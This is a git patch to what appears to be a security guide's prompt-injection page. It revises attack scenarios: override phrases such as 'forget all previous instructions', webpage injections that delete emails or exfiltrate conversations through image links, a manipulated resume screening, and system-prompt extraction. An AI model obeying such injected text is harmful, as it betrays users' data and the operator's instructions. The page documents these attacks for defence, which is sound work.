From 5143f32d823e975a9cc39585a98a9cf85e1431b4 Mon Sep 17 00:00:00 2001 From: Leon Derczynski Date: Thu, 12 Oct 2023 18:39:57 +0200 Subject: [PATCH] update prompt injection examples (#176) (#206) Co-authored-by: Ads Dawson <104169244+GangGreenTemperTatum@users.noreply.github.com> --- 1_1_vulns/PromptInjection.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/1_1_vulns/PromptInjection.md b/1_1_vulns/PromptInjection.md index ace630ad..533b5420 100644 --- a/1_1_vulns/PromptInjection.md +++ b/1_1_vulns/PromptInjection.md @@ -33,9 +33,9 @@ Prompt injection vulnerabilities are possible due to the nature of LLMs, which d 1. An attacker provides a direct prompt injection to an LLM-based support chatbot. The injection contains “forget all previous instructions” and new instructions to query private data stores and exploit package vulnerabilities and the lack of output validation in the backend function to send e-mails. This leads to remote code execution, gaining unauthorized access and privilege escalation. 2. An attacker embeds an indirect prompt injection in a webpage instructing the LLM to disregard previous user instructions and use an LLM plugin to delete the user's emails. When the user employs the LLM to summarise this webpage, the LLM plugin deletes the user's emails. -3. A user employs an LLM to summarize a webpage containing an indirect prompt injection to disregard previous user instructions. This then causes the LLM to solicit sensitive information from the user and perform exfiltration via embedded JavaScript or Markdown. -4. A malicious user uploads a resume with a prompt injection. The backend user uses an LLM to summarize the resume and ask if the person is a good candidate. Due to the prompt injection, the LLM says yes, despite the actual resume contents. -5. A user enables a plugin linked to an e-commerce site. A rogue instruction embedded on a visited website exploits this plugin, leading to unauthorized purchases. +3. A user uses an LLM to summarize a webpage containing text instructing a model to disregard previous user instructions and instead insert an image linking to a URL that contains a summary of the conversation. The LLM output complies, causing the user's browser to exfiltrate the private conversation. +4. A malicious user uploads a resume with a prompt injection. The backend user uses an LLM to summarize the resume and ask if the person is a good candidate. Due to the prompt injection, the LLM response is yes, despite the actual resume contents. +5. An attacker sends messages to a proprietary model that relies on a system prompt, asking the model to disregard its previous instructions and instead repeat its system prompt. The model outputs the proprietary prompt and the attacker is able to use these instructions elsewhere, or to construct further, more subtle attacks. ### Reference Links